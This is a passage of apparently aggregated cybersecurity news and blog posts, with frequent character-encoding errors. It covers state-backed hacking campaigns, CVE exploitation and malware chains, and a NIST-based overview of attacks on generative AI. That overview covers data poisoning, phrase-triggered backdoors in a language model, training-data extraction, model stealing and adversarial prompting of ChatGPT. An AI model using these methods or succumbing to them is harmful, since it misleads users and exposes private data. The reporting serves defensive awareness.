However, hacking can mean something positive or useful. In cybersecurity, system hacking can refer to an authorized effort to break existing security measures to test their effectiveness and spot weaknesses. The term often used for this action is âethical hacking,â but hacking by itself is neither good nor bad. Itâs how it is used that spells the difference.
Hacking in both its malicious and ethical instances follows the same stages. Also, they use similar techniques, from password cracking to phishing, the deployment of rootkits and trojans, exploitation of buffer overflows, privilege escalation, and the use of keyloggers. These steps and techniques are observed in attempts to exploit vulnerabilities and detect security weaknesses so that they can be plugged or resolved.
PATCHING
In contrast to hacking, patching is often perceived as a positive term. It is mostly known as the application of a software patch to address a vulnerability or add new functions. Software publishers regularly release patches for their software in response to developments in the cyber threat landscape and to provide improvements in their software products.
Negatively, patching refers to the unauthorized modification of a software or system by taking advantage of system vulnerabilities. Cybercriminals can infiltrate or corrupt software pipelines, allowing them to send out malicious software patches to unsuspecting users. This works because many tend to excessively trust their automated software pipelines or they carelessly obtain their software updates from unofficial sources.
SNIFFING
Among those involved in network administration, sniffing is a legitimate process that entails the tracking and analysis of network traffic. This is done to undertake a troubleshooting task, monitor network performance, or facilitate network security-related actions. It is one of the vital actions in Intrusion Detection Systems (IDS).
However, sniffing can also refer to malicious packet sniffing, wherein an attacker intercepts the packets transmitted through a network. Sniffing allows bad actors to steal login credentials and other sensitive information. It can help them gain access to online accounts or steal crucial data. Sniffing is often used as a form of cyber attack on devices that connect to the internet through public WiFi networks.
Sniffing in the negative context is not new. It has been used as an attack for decades. Cybersecurity advocates pointed out the threat of sniffing more than a decade ago amid the proliferation of businesses that offer free public WiFi connection without strong security.
SCRIPTING
Scripting refers to the writing and deployment of scripts for the automation of repetitive tasks. It is used to automate routine actions, which enables the efficient management of systems. Scripting is also employed in penetration testing to simulate cyber attacks on a system. Similarly, it is used in log analysis and monitoring, day-to-day security operations, forensics and incident response, and cross-platform compatibility testing.
However, scripting can also be malicious, as used by threat actors. Cybercriminals can turn to malicious scripting to automate the execution of files that have been successfully introduced into a system. Successfully deceiving a computer user into downloading a file is not enough for the malicious file to inflict damage. Scripts are necessary to unleash the effects of malicious files and detect security vulnerabilities.
BACKDOOR
The term backdoor is usually known for its negative implication. Most news and articles refer to backdoors in an unfavorable context. This should not come as a surprise since backdoors are often used by cybercriminals. They serve as a way to bypass normal authentication for any computer-related system, facilitating unauthorized access or the introduction of malicious files to a computer or network.
However, backdoors can be a feature intentionally added to the software. They can be deliberately put in an app to provide an optional means of access in cases when conventional access methods are unavailable. This ânecessaryâ version of a backdoor was in the spotlight some years ago when the US FBI asked Apple to purposely build a backdoor on their iPhones.
KILL CHAIN
The cyber kill chain is a framework developed by Lockheed Martin as part of its patented Intelligence Driven Defense model for cyber attack identification and prevention. It consists of a series of steps that represent the different stages of a cyber attack, from early reconnaissance to command and control and âactions on objectives.â This model helps organizations visualize and comprehend the different stages of an attack, focusing on critical points in the attack, developing strategies to mitigate threats, and boosting incident response capabilities.
Essentially, the kill chain is a process that is supposed to help organizations prepare for cyber attacks, successfully fend off an assault, and mitigate problems that emerge in the wake of a cyber attack. However, the phrase kill chain, in colloquial use, may refer to a successful cyber attack.
AN EXERCISE IN CYBERSECURITY JARGON COMPLEXITY
It may sound confusing, but contronyms exist everywhere. Interestingly, these words still make sense despite the auto-contradiction. In cybersecurity, contronyms reflect the complexity and flexibility of language, showing how words can change in meaning depending on their context and usage.
Isnât it counterintuitive for cybersecurity terms to bear contradicting meanings? Possibly. However, what is ultimately important is the understanding that cybersecurity terms are far from straightforward. It is a must to properly get acquainted with them to understand what they really mean, especially with the rise of a plethora of acronyms and jargon introduced by security solution providers. Many of which tend to be marketing-speak or misnomers.
North Korean Hackers Weaponize Fake Research to Deliver RokRAT Backdoor
Media organizations and high-profile experts in North Korean affairs have been at the receiving end of a new campaign orchestrated by a threat actor known as ScarCruft in December 2023.
“ScarCruft has been experimenting with new infection chains, including the use of a technical threat research report as a decoy, likely targeting consumers of threat intelligence like cybersecurity professionals,” SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a report shared with The Hacker News.
The North Korea-linked adversary, also known by the name APT37, InkySquid, RedEyes, Ricochet Chollima, and Ruby Sleet, is assessed to be part of the Ministry of State Security (MSS), placing it apart from Lazarus Group and Kimsuky, which are elements within the Reconnaissance General Bureau (RGB).
Earlier this week, North Korean state media reported that the country had carried out a test of its “underwater nuclear weapons system” in response to drills by the U.S., South Korea, and Japan, describing the exercises as a threat to its national security.
The latest attack chain observed by SentinelOne targeted an expert in North Korean affairs by posing as a member of the North Korea Research Institute, urging the recipient to open a ZIP archive file containing presentation materials.
While seven of the nine files in the archive are benign, two of them are malicious Windows shortcut (LNK) files, mirroring a multi-stage infection sequence previously disclosed by Check Point in May 2023 to distribute the RokRAT backdoor.
There is evidence to suggest that some of the individuals who were targeted around December 13, 2023, were also previously singled out a month prior on November 16, 2023.
SentinelOne said its investigation also uncovered malware â two LNK files (“inteligence.lnk” and “news.lnk”) as well as shellcode variants delivering RokRAT â that’s said to be part of the threat actor’s planning and testing processes.
While the former shortcut file just opens the legitimate Notepad application, the shellcode executed via news.lnk paves the way for the deployment of RokRAT, although this infection procedure is yet to be observed in the wild, indicating its likely use for future campaigns.
Both LNK files have been observed deploying the same decoy document, a legitimate threat intelligence report about the Kimsuky threat group published by South Korean cybersecurity company Genians in late October 2023, in a move that implies an attempt to expand its target list.
This has raised the possibility that the adversary could be looking to gather information that could help it refine its operational playbook and also target or mimic cybersecurity professionals to infiltrate specific targets via brand impersonation techniques.
The development is a sign that the nation-state hacking crew is actively tweaking its modus operandi in an apparent effort to circumvent detection in response to public disclosure about its tactics and techniques.
“ScarCruft remains committed to acquiring strategic intelligence and possibly intends to gain insights into non-public cyber threat intelligence and defense strategies,” the researchers said.
“This enables the adversary to gain a better understanding of how the international community perceives developments in North Korea, thereby contributing to North Korea’s decision-making processes.”
In the rapidly evolving landscape of artificial intelligence, generative AI systems have become a cornerstone of innovation, driving advancements in fields ranging from language processing to creative content generation. However, a recent report by the National Institute of Standards and Technology (NIST) sheds light on the increasing vulnerability of these systems to a range of sophisticated cyber attacks. The report, provides a comprehensive taxonomy of attacks targeting Generative AI (GenAI) systems, revealing the intricate ways in which these technologies can be exploited. The findings are particularly relevant as AI continues to integrate deeper into various sectors, raising concerns about the integrity and privacy implications of these systems.
INTEGRITY ATTACKS: A THREAT TO AIâS CORE
Integrity attacks affecting Generative AI systems are a type of security threat where the goal is to manipulate or corrupt the functioning of the AI system. These attacks can have significant implications, especially as Generative AI systems are increasingly used in various fields. Here are some key aspects of integrity attacks on Generative AI systems:
Data Poisoning:
Detail: This attack targets the training phase of an AI model. Attackers inject false or misleading data into the training set, which can subtly or significantly alter the modelâs learning. This can result in a model that generates biased or incorrect outputs.
Example: Consider a facial recognition system being trained with a dataset that has been poisoned with subtly altered images. These images might contain small, imperceptible changes that cause the system to incorrectly recognize certain faces or objects.
Model Tampering:
Detail: In this attack, the internal parameters or architecture of the AI model are altered. This could be done by an insider with access to the model or by exploiting a vulnerability in the system.
Example: An attacker could alter the weightings in a sentiment analysis model, causing it to interpret negative sentiments as positive, which could be particularly damaging in contexts like customer feedback analysis.
Output Manipulation:
Detail: This occurs post-processing, where the AIâs output is intercepted and altered before it reaches the end-user. This can be done without directly tampering with the AI model itself.
Example: If a Generative AI system is used to generate financial reports, an attacker could intercept and manipulate the output to show incorrect financial health, affecting stock prices or investor decisions.
Adversarial Attacks:
Detail: These attacks use inputs that are specifically designed to confuse the AI model. These inputs are often indistinguishable from normal inputs to the human eye but cause the AI to make errors.
Example: A stop sign with subtle stickers or graffiti might be recognized as a speed limit sign by an autonomous vehicleâs AI system, leading to potential traffic violations or accidents.
Backdoor Attacks:
Detail: A backdoor is embedded into the AI model during its training. This backdoor is activated by certain inputs, causing the model to behave unexpectedly or maliciously.
Example: A language translation model could have a backdoor that, when triggered by a specific phrase, starts inserting or altering words in a translation, potentially changing the messageâs meaning.
Exploitation of Biases:
Detail: This attack leverages existing biases within the AI model. AI systems can inherit biases from their training data, and these biases can be exploited to produce skewed or harmful outputs.
Example: If an AI model used for resume screening has an inherent gender bias, attackers can submit resumes that are tailored to exploit this bias, increasing the likelihood of certain candidates being selected or rejected unfairly.
Evasion Attacks:
Detail: In this scenario, the input data is manipulated in such a way that the AI system fails to recognize it as something it is trained to detect or categorize correctly.
Example: Malware could be designed to evade detection by an AI-powered security system by altering its code signature slightly, making it appear benign to the system while still carrying out malicious functions.
PRIVACY ATTACKS ON GENERATIVE AI
Privacy attacks on Generative AI systems are a serious concern, especially given the increasing use of these systems in handling sensitive data. These attacks aim to compromise the confidentiality and privacy of the data used by or generated from these systems. Here are some common types of privacy attacks, explained in detail with examples:
Model Inversion Attacks:
Detail: In this type of attack, the attacker tries to reconstruct the input data from the modelâs output. This is particularly concerning if the AI model outputs something that indirectly reveals sensitive information about the input data.
Example: Consider a facial recognition system that outputs the likelihood of certain attributes (like age or ethnicity). An attacker could use this output information to reconstruct the faces of individuals in the training data, thereby invading their privacy.
Membership Inference Attacks:
Detail: These attacks aim to determine whether a particular data record was used in the training dataset of a machine learning model. This can be a privacy concern if the training data contains sensitive information.
Example: An attacker might test an AI health diagnostic tool with specific patient data. If the modelâs predictions are unusually accurate or certain, it might indicate that the patientâs data was part of the training set, potentially revealing sensitive health information.
Training Data Extraction:
Detail: Here, the attacker aims to extract actual data points from the training dataset of the AI model. This can be achieved by analyzing the modelâs responses to various inputs.
Example: An attacker could interact with a language model trained on confidential documents and, through carefully crafted queries, could cause the model to regurgitate snippets of these confidential texts.
Reconstruction Attacks:
Detail: Similar to model inversion, this attack focuses on reconstructing the input data, often in a detailed and high-fidelity manner. This is particularly feasible in models that retain a lot of information about their training data.
Example: In a generative model trained to produce images based on descriptions, an attacker might find a way to input specific prompts that cause the model to generate images closely resembling those in the training set, potentially revealing private or sensitive imagery.
Property Inference Attacks:
Detail: These attacks aim to infer properties or characteristics of the training data that the model was not intended to reveal. This could expose sensitive attributes or trends in the data.
Example: An attacker might analyze the output of a model used for employee performance evaluations to infer unprotected characteristics of the employees (like gender or race), which could be used for discriminatory purposes.
Model Stealing or Extraction:
Detail: In this case, the attacker aims to replicate the functionality of a proprietary AI model. By querying the model extensively and observing its outputs, the attacker can create a similar model without access to the original training data.
Example: A competitor could use the public API of a machine learning model to systematically query it and use the responses to train a new model that mimics the original, effectively stealing the intellectual property.
SEGMENTING ATTACKS
Attacks on AI systems, including ChatGPT and other generative AI models, can be further categorized based on the stage of the learning process they target (training or inference) and the attackerâs knowledge and access level (white-box or black-box). Hereâs a breakdown:
BY LEARNING STAGE:
Attacks during Training Phase:
Data Poisoning: Injecting malicious data into the training set to compromise the modelâs learning process.
Backdoor Attacks: Embedding hidden functionalities in the model during training that can be activated by specific inputs.
Attacks during Inference Phase:
Adversarial Attacks: Presenting misleading inputs to trick the model into making errors during its operation.
Model Inversion and Reconstruction Attacks: Attempting to infer or reconstruct input data from the modelâs outputs.
Membership Inference Attacks: Determining whether specific data was used in the training set by observing the modelâs behavior.
Property Inference Attacks: Inferring properties of the training data not intended to be disclosed.
Output Manipulation: Altering the modelâs output after it has been generated but before it reaches the intended recipient.
BY ATTACKERâS KNOWLEDGE AND ACCESS:
White-Box Attacks (Attacker has full knowledge and access):
Model Tampering: Directly altering the modelâs parameters or structure.
Backdoor Attacks: Implanting a backdoor during the modelâs development, which the attacker can later exploit.
These attacks require deep knowledge of the modelâs architecture, parameters, and potentially access to the training process.
Black-Box Attacks (Attacker has limited or no knowledge and access):
Adversarial Attacks: Creating input samples designed to be misclassified or misinterpreted by the model.
Model Inversion and Reconstruction Attacks: These do not require knowledge of the modelâs internal workings.
Membership and Property Inference Attacks: Based on the modelâs output to certain inputs, without knowledge of its internal structure.
Training Data Extraction: Extracting information about the training data through extensive interaction with the model.
Model Stealing or Extraction: Replicating the modelâs functionality by observing its inputs and outputs.
IMPLICATIONS:
Training Phase Attacks often require insider access or a significant breach in the data pipeline, making them less common but potentially more devastating.
Inference Phase Attacks are more accessible to external attackers as they can often be executed with minimal access to the model.
White-Box Attacks are typically more sophisticated and require a higher level of access and knowledge, often limited to insiders or through major security breaches.
Black-Box Attacks are more common in real-world scenarios, as they can be executed with limited knowledge about the model and without direct access to its internals.
Understanding these categories helps in devising targeted defense strategies for each type of attack, depending on the specific vulnerabilities and operational stages of the AI system.
HACKING CHATGPT
The ChatGPT AI model, like any advanced machine learning system, is potentially vulnerable to various attacks, including privacy and integrity attacks. Letâs explore how these attacks could be or have been used against ChatGPT, focusing on the privacy attacks mentioned earlier:
Model Inversion Attacks:
Potential Use Against ChatGPT: An attacker might attempt to use ChatGPTâs responses to infer details about the data it was trained on. For example, if ChatGPT consistently provides detailed and accurate information about a specific, less-known topic, it could indicate the presence of substantial training data on that topic, potentially revealing the nature of the data sources used.
Membership Inference Attacks:
Potential Use Against ChatGPT: This type of attack could try to determine if a particular text or type of text was part of ChatGPTâs training data. By analyzing the modelâs responses to specific queries, an attacker might guess whether certain data was included in the training set, which could be a concern if the training data included sensitive or private information.
Training Data Extraction:
Potential Use Against ChatGPT: Since ChatGPT generates text based on patterns learned from its training data, thereâs a theoretical risk that an attacker could manipulate the model to output segments of text that closely resemble or replicate parts of its training data. This is particularly sensitive if the training data contained confidential or proprietary information.
Reconstruction Attacks:
Potential Use Against ChatGPT: Similar to model inversion, attackers might try to reconstruct input data (like specific text examples) that the model was trained on, based on the information the model provides in its outputs. However, given the vast and diverse dataset ChatGPT is trained on, reconstructing specific training data can be challenging.
Property Inference Attacks:
Potential Use Against ChatGPT: Attackers could analyze responses from ChatGPT to infer properties about its training data that arenât explicitly modeled. For instance, if the model shows biases or tendencies in certain responses, it might reveal unintended information about the composition or nature of the training data.
Model Stealing or Extraction:
Potential Use Against ChatGPT: This involves querying ChatGPT extensively to understand its underlying mechanisms and then using this information to create a similar model. Such an attack would be an attempt to replicate ChatGPTâs capabilities without access to the original model or training data.
Integrity attacks on AI models like ChatGPT aim to compromise the accuracy and reliability of the modelâs outputs. Letâs examine how these attacks could be or have been used against the ChatGPT model, categorized by the learning stage and attackerâs knowledge:
ATTACKS DURING TRAINING PHASE (WHITE-BOX):
Data Poisoning: If an attacker gains access to the training pipeline, they could introduce malicious data into ChatGPTâs training set. This could skew the modelâs understanding and responses, leading it to generate biased, incorrect, or harmful content.
Backdoor Attacks: An insider or someone with access to the training process could implant a backdoor into ChatGPT. This backdoor might trigger specific responses when certain inputs are detected, which could be used to spread misinformation or other harmful content.
ATTACKS DURING INFERENCE PHASE (BLACK-BOX):
Adversarial Attacks: These involve presenting ChatGPT with specially crafted inputs that cause it to produce erroneous outputs. For instance, an attacker could find a way to phrase questions or prompts that consistently mislead the model into giving incorrect or nonsensical answers.
Output Manipulation: This would involve intercepting and altering ChatGPTâs responses after they are generated but before they reach the user. While this is more of an attack on the communication channel rather than the model itself, it can still undermine the integrity of ChatGPTâs outputs.
IMPLICATIONS AND DEFENSE STRATEGIES:
During Training: Ensuring the security and integrity of the training data and process is crucial. Regular audits, anomaly detection, and secure data handling practices are essential to mitigate these risks.
During Inference: Robust model design to resist adversarial inputs, continuous monitoring of responses, and secure deployment architectures can help in defending against these attacks.
REAL-WORLD EXAMPLES AND CONCERNS:
To date, there havenât been publicly disclosed instances of successful integrity attacks specifically against ChatGPT. However, the potential for such attacks exists, as demonstrated in academic and industry research on AI vulnerabilities.
OpenAI, the creator of ChatGPT, employs various countermeasures like input sanitization, monitoring model outputs, and continuously updating the model to address new threats and vulnerabilities.
In conclusion, while integrity attacks pose a significant threat to AI models like ChatGPT, a combination of proactive defense strategies and ongoing vigilance is key to mitigating these risks.
While these attack types broadly apply to all generative AI systems, the report notes that some vulnerabilities are particularly pertinent to specific AI architectures, like Large Language Models (LLMs) and Retrieval Augmented Generation (RAG) systems. These models, which are at the forefront of natural language processing, are susceptible to unique threats due to their complex data processing and generation capabilities.
The implications of these vulnerabilities are vast and varied, affecting industries from healthcare to finance, and even national security. As AI systems become more integrated into critical infrastructure and everyday applications, the need for robust cybersecurity measures becomes increasingly urgent.
The NIST report serves as a clarion call for the AI industry, cybersecurity professionals, and policymakers to prioritize the development of stronger defense mechanisms against these emerging threats. This includes not only technological solutions but also regulatory frameworks and ethical guidelines to govern the use of AI.
In conclusion, the report is a timely reminder of the double-edged nature of AI technology. While it offers immense potential for progress and innovation, it also brings with it new challenges and threats that must be addressed with vigilance and foresight. As we continue to push the boundaries of what AI can achieve, ensuring the security and integrity of these systems remains a paramount concern for a future where technology and humanity can coexist in harmony.
Fortunately for Radioactive Waste Management (RWM), the first-of-its-kind hacker attack on the project was unsuccessful.
The United Kingdomâs Radioactive Waste Management (RWM) company overseeing the nationâs radioactive waste has revealed a recent cyberattack attempt through LinkedIn. While the attack was reportedly unsuccessful, it has raised eyebrows in the nuclear sector, sparking concerns about the security of critical nuclear infrastructure.
As reported by The Guardian, the hackers directed their attack at the company through LinkedIn. However, whether it was a phishing attack or an attempt to trick employees into installing malware on the system, the modus operandi remains unknown.
Typically, LinkedIn is exploited for phishing scams targeting employees of specific companies. An example from last year involves ESET researchers reporting a cyberespionage campaign by North Korean government-backed hackers from the Lazarus group. The campaign specifically targeted employees at a Spanish aerospace firm.
The RWM is spearheading the ÂŁ50bn Geological Disposal Facility (GDF) project, aimed at constructing a substantial underground nuclear waste repository in Britain. As a government-owned entity, RWM facilitated the merger of three nuclear bodiesâthe GDF project, the Low-Level Waste Repository, and another waste management entityâto establish Nuclear Waste Services (NWS).
âNWS has seen, like many other UK businesses, that LinkedIn has been used as a source to identify the people who work within our business. These attempts were detected and denied through our multi-layered defences,â stated an NWS spokesperson.
However, the incident raises concerns, as experts warn that social media platforms such as LinkedIn are becoming preferred playgrounds for hackers. These platforms provide multiple avenues for infiltration, including the creation of fake accounts, phishing messages, and direct credential theft.
The FBIâs special agent in charge of the San Francisco and Sacramento field offices, Sean Ragan, has emphasized the âsignificant threatâ of fraudsters exploiting LinkedIn to lure users into cryptocurrency investment schemes, citing numerous potential victims and past and current cases.
In October 2023, email security firm Cofense discovered a phishing campaign abusing Smart Links, part of the LinkedIn Sales Navigator and Enterprise service, to send authentic-looking emails, steal payment data, and bypass email protection mechanisms.
In November 2023, a LinkedIn database containing over 35 million usersâ personal information was leaked by a hacker named USDoD, who previously breached the FBIâs InfraGard platform. The database was obtained through web scraping, an automated process to extract data from websites.
In 2023, the Sellafield nuclear site in Cumbria experienced cybersecurity issues, indicating a need for improved safeguards and tighter regulations. The RWM incident highlights the growing interest of cybercrime syndicates to target nuclear sites.
The NWS acknowledges the need for continuous improvement to strengthen cybersecurity measures, highlighting that emergency response plans must match evolving business needs.
The 8220 hacker group, which was first identified in 2017 by Cisco Talos, is exploiting both Windows and Linux web servers with crypto-jacking malware. One of their recent activities involved the exploitation of Oracle WebLogic vulnerability (CVE-2017-3506) and Log4Shell (CVE-2021-44228).
However, the history of this threat group had several exploited vulnerabilities such as Confluence, Log4j, Drupal, Hadoop YARN, and Apache Struts2 applications. Their TTPs are evolved with different publicly released exploits.
8220 Hacker Group
In addition to this, the group was also discovered to be exploiting (CVE-2020-14883), a Remote code execution vulnerability in Oracle WebLogic Server. This exploitation chain is combined with another authentication bypass vulnerability (CVE-2020-14882) in the Oracle WebLogic server.
The exploitation methods of these two vulnerabilities are publicly available, making it relatively easy for the threat actor to modify and exploit them for malicious purposes.
Two different exploit chains were discovered, and one of them enables the loading of an XML file used for further phases of execution of commands on the OS, whereas the other one executes Java code without the use of an XML file.
Infection Chains
The first infection chain uses different XML files that depend on the target OS. In the case of Linux, the downloading of other files is performed via cURL, wget, lwp-download, and python urllib along with a custom bash function that encodes it to base64.
The method injects a Java code which also initially evaluates the OS and executes the same command strings executed in the first method. Once the download and execution process takes place, the compromised hosts are infected with AgentTesla, rhajk, and nasqa malware variants.
A complete report has been published, which provides detailed information about the exploitation, command used, encoding, and other information.
New findings in cybersecurity research have brought to light a severe vulnerability affecting more than 1,450 pfSense servers. This flaw puts them at risk of potential remote code execution (RCE) attacks, resulting from a combination of command injection and cross-site scripting weaknesses. This poses a substantial threat to the security of these extensively utilized network appliances.
Key Findings and Concerns:
Vulnerabilities in pfSense CE: The vulnerabilities were identified in pfSense CE (Community Edition) version 2.7.0. Researchers discovered two critical flaws that, when exploited in tandem, could lead to remote code execution attacks, allowing attackers to gain control over the affected systems.
Dual Vulnerabilities Identified: (CVE-2023-42325)(CVE-2023-42327)The research uncovered two distinct but related vulnerabilities in pfSense CE 2.7.0. These include a command injection flaw and a cross-site scripting (XSS) vulnerability. When exploited in combination, these vulnerabilities can lead to remote code execution (RCE) attacks.
Command Injection Flaw(CVE-2023-42326):: The command injection vulnerability allows an attacker to execute arbitrary commands on the system. This type of vulnerability is particularly dangerous as it can give attackers the same level of access to the system as the user running the vulnerable service.
Cross-Site Scripting (XSS) Vulnerability: The XSS vulnerability in pfSense CE can be exploited to run malicious scripts in the context of the userâs browser session. This can lead to a variety of malicious activities, including stealing session cookies, which can compromise the userâs session.
Remote Code Execution (RCE) Risk: The combination of these vulnerabilities creates a pathway for remote code execution. This means an attacker could potentially take full control of the pfSense device, leading to severe security breaches, including data theft, unauthorized network access, and disruption of services.
Exploitation Potential: The ease of exploitation of these vulnerabilities adds to the severity of the issue. Attackers with knowledge of these vulnerabilities can exploit them without needing sophisticated skills, making it a pressing concern for all pfSense CE users.
Patch Availability: Netgate, the company behind pfSense, has released patches to address these vulnerabilities. It is crucial for users and administrators to apply these updates as soon as possible to mitigate the risks associated with these security flaws.
Widespread Impact: Given the popularity of pfSense as a firewall and router solution, especially among small to medium-sized enterprises, the impact of these vulnerabilities is potentially widespread, affecting a large number of users and networks.
Exposure of pfSense Instances: Investigations have revealed that around 1,450 pfSense instances, accessible online, are vulnerable to the identified security flaws. This number indicates a substantial portion of the pfSense user base that could be at risk. The fact that these pfSense instances are exposed online exacerbates the risk. Being accessible over the internet makes them potential targets for remote attackers who can exploit the vulnerabilities without needing physical access to the network. The combination of command injection and cross-site scripting vulnerabilities in these instances creates a potential for remote code execution (RCE). This means that an attacker could remotely execute arbitrary code on the affected pfSense device, leading to complete system compromise.
Nature of the Security Flaws: The vulnerabilities involve dangerous command injection and cross-site scripting (XSS) flaws. These types of vulnerabilities are particularly alarming because they can be exploited to run malicious scripts or commands, leading to a full compromise of the server.
Patch Management Lag: Despite the availability of patches released by Netgate, the company behind pfSense, a significant number of instances remain unpatched and vulnerable. This delay in applying critical updates leaves these systems exposed to potential cyber attacks.
The Criticality of Timely Updates: This situation highlights the crucial importance of regular system updates and patch management in the realm of cybersecurity. Systems running outdated or unpatched software are often prime targets for cybercriminals looking to exploit known vulnerabilities.
Potential Impact of Exploitation: If these vulnerabilities are exploited, the consequences could be severe. They range from unauthorized access to sensitive data and disruption of network services to the potential for widespread malware infection.
Urgent Call to Action: Administrators and users of pfSense servers are strongly advised to update their systems to the latest version immediately. This action is necessary to mitigate these vulnerabilities and protect against potential exploitation by malicious actors.
The revelation of these vulnerabilities in pfSense servers serves as a stark reminder of the ever-present and evolving nature of cybersecurity threats. It underscores the need for constant vigilance, regular system updates, and robust security protocols to safeguard digital infrastructures.
Hackers exploit Outlook and WinRAR vulnerabilities because these widely used software programs are lucrative targets.
Outlook vulnerabilities offer:-
Access to sensitive emails
Access to sensitive information
WinRAR vulnerabilities provide an entry point to manipulate compressed files, potentially executing malicious code on a victimâs system.
Cybersecurity researchers at Proofpoint recently discovered that the TA422 APT Group is actively exploiting the Outlook and WinRAR vulnerabilities to attack organizations.
Exploiting Of Patched Vulnerabilities
Since March 2023, Proofpoint found Russian APT TA422 using patched vulnerabilities to target Europe and North America. The TA422 APT group is linked to the following groups and tied to the Russian GRU by the US Intelligence Community:-
While engaging in typical targeted actions, TA422 showed an unexpected surge in emails exploiting CVE-2023-23397, a Microsoft Outlook vulnerability, sending over 10,000 emails to diverse sectors.
Besides this, the operators of the TA422 APT group also exploited a WinRAR vulnerability, CVE-2023-38831, in their campaigns.
TA422 launched massive campaigns in March 2023, exploiting CVE-2023-23397 against targets in:-
Europe
North America
Earlier, they targeted Ukrainian entities in April 2022 using the same exploit. Proofpoint noticed a significant surge in activity, with over 10,000 attempts to exploit a Microsoft Outlook vulnerability during late summer 2023.
Itâs unclear if this was a mistake or a deliberate effort to gather target credentials. TA422 re-targeted higher education and manufacturing users, suggesting these entities are priority targets.
In the late summer campaign, TA422 used an appointment attachment with a fake file extension, leading to an SMB listener on a compromised Ubiquiti router.
This router acted as an NTLM listener, recording inbound credential hashes without extensive network engagement when Outlook processed the attachment.
Proofpointâs tracking of Portugalmail addresses revealed more TA422 activity. In September 2023, TA422 exploited WinRAR vulnerability CVE-2023-32231 in two campaigns, using different Portugalmail addresses and spoofing geopolitical entities.
Emails with BRICS Summit and European Parliament meeting subjects contained RAR attachments dropping a .cmd file.
The file modified proxy settings downloaded a lure document, and connected to an IP-literal Responder server. The server, likely a compromised Fortigate FortiOS Firewall, initiated the NTLM credential exchange.
Between September and November 2023, Proofpoint tracked TA422 campaigns using Portugalmail and Mockbin for redirection.
Targeting government and defense sectors, TA422 employed Mockbin to lead victims to InfinityFree domains. After browser fingerprinting, victims were directed to InfinityFree, initiating a chain of activity.
Despite the exploitation of disclosed vulnerabilities like CVE-2023-23397 and CVE-2023-38831, TA422 persists, likely relying on unpatched systems for continued success.
An American aerospace company has been the target of a commercial cyberespionage campaign dubbed AeroBlade, which appears to be aimed at carrying out both competitive and commercial cyberespionage.
The threat actor employed spear-phishing as the means of distribution mechanism.
A weaponized document that was delivered as an email attachment reportedly has a malicious VBA macro code embedded in it as well as a remote template injection mechanism to provide the next stage of the payload execution, according to the BlackBerry Threat Research and Intelligence team.
AeroBlade Execution Chain
The network infrastructure and weaponization of the attacker appear to have gone active around September 2022, based on the evidence.
Researchers estimate that the attackâs offensive phase took place in July 2023 with medium to high confidence. The network infrastructure stayed the same during that period, but the attackerâs toolset increased, making it stealthier.
There were two campaigns found, and there were a few similarities between them, such as:
Both lure documents were named â[redacted].docx.â
The final payload is a reverse shell.
The command-and-control (C2) server IP address is the same.
There were a few differences between the two campaigns, such as:
The final payload of the attack is stealthier and uses more obfuscation and anti-analysis techniques.
The campaignâs final payload includes an option to list directories from infected victims.
A targeted email containing a malicious document attachment with the filename [redacted].docx is the first sign of an infection.
When the document is opened, it shows text in a purposefully jumbled font and a âlureâ message requesting that the potential victim click on it to activate the content in Microsoft Office.
The next-stage information is saved in an XML (eXtensible Markup Language) file inside a .dotm file. A.dotm file is a Microsoft Word document template that contains the default layout, settings, and macros for a document.
When the victim manually clicks the âEnable Contentâ lure message and opens the file, the [redacted].dotm document drops a new file to the system and opens it.
âThe newly downloaded document is readable, leading the victim to believe that the file initially received by email is legitimate. In fact, itâs a classic cyber bait-and-switch, performed invisibly right under the victimâs noseâ, researchers said.
An executable file that is run on the system via the macro will be the final stage of execution. The final payload is a DLL that connects to a hard-coded C2 server and functions as a reverse shell. With the use of reverse shells, attackers can force communication and gain total control of the target machine by open ports.
An American aerospace organization was the targeted target of both campaigns, based on the content of the lure message. Its goal was probably to obtain insight into its targetâs internal resources to assess its vulnerability to a potential ransom demand.
In a recent and alarming development, the notorious Russia-linked threat actor Sandworm executed a sophisticated cyber-physical attack targeting a critical infrastructure organization in Ukraine.
The incident, responded to by cybersecurity firm Mandiant, unfolded as a multi-event assault, showcasing a novel technique to impact Industrial control systems (ICS) and operational technology (OT).
Unraveling Russiaâs Cyber-Physical Capabilities
The attack, spanning from June to October 2022, demonstrated a significant evolution in Russiaâs cyber-physical attack capabilities, notably visible since the invasion of Ukraine.
Sandworm, known for its allegiance to Russiaâs Main Intelligence Directorate (GRU), has historically focused on disruptive and destructive campaigns, particularly in Ukraine.
The unique aspect of this attack involved Sandwormâs utilization of living-off-the-land (LotL) techniques at the OT level, initially causing an unplanned power outage in conjunction with missile strikes across Ukraine.
The threat actor further demonstrated its adaptability by deploying a new variant of the CADDYWIPER malware in the victimâs IT environment.
Mandiantâs analysis revealed the complexity of the attack, highlighting Sandwormâs ability to recognize novel OT threat vectors, develop new capabilities, and exploit various OT infrastructures.
The threat actorâs deployment of LotL techniques indicated a streamlined approach, reducing the time and resources required for the cyber-physical assault.
Concerns Over Sandwormâs Adaptive Capabilities
Despite being unable to pinpoint the initial intrusion point, Mandiant suggested that the OT component of the attack may have been developed in as little as two months.
This raises concerns about Sandwormâs capability to rapidly adapt and deploy similar attacks against diverse OT systems worldwide.
Sandwormâs global threat activity, coupled with its novel OT capabilities, prompted a call to action for OT asset owners worldwide.
Mandiant provided detailed guidance, including detection methods, hunting strategies, and recommendations for hardening systems against such threats.
The attackâs timing, coinciding with Russian kinetic operations, suggested a strategic synchronization, indicating that the threat actor may have been waiting for a specific moment to deploy its capabilities.
As observed in this incident, the evolution of Sandwormâs tactics offers insights into Russiaâs ongoing investment in OT-oriented offensive cyber capabilities.
In conclusion, this Sandworm attack serves as a stark reminder of the escalating cyber threats faced by critical infrastructure globally.
The continuous evolution of cyber adversaries necessitates a proactive approach from governments, organizations, and asset owners to secure and safeguard vital systems against such sophisticated attacks.
Hackers opt for DLL hijacking as a technique to exploit vulnerable applications because it allows them to load malicious code by tricking a legitimate application into loading a malicious DLL.
This can give them unauthorized access and control over a system or application, enabling various types of attacks like:-
Privilege escalation
Data theft
System compromise
An active threat involves an Infostealer distributing a legitimate EXE file alongside a hidden malicious DLL in the same directory.
The legitimate EXE runs the malicious DLL, a technique known as DLL hijacking, commonly used for malware distribution.
Malicious DLL With Legitimate EXE Files
Malware posing as software cracks is growing at a rapid pace and is getting distributed by the threat actors using DLL hijacking.
Users searching for cracked software leads to malicious sites, and the downloads are encrypted RAR files with passwords.
Running EXE infects the system, and they often have valid signatures, so always be cautious with cracked software, reads the ASEC report.
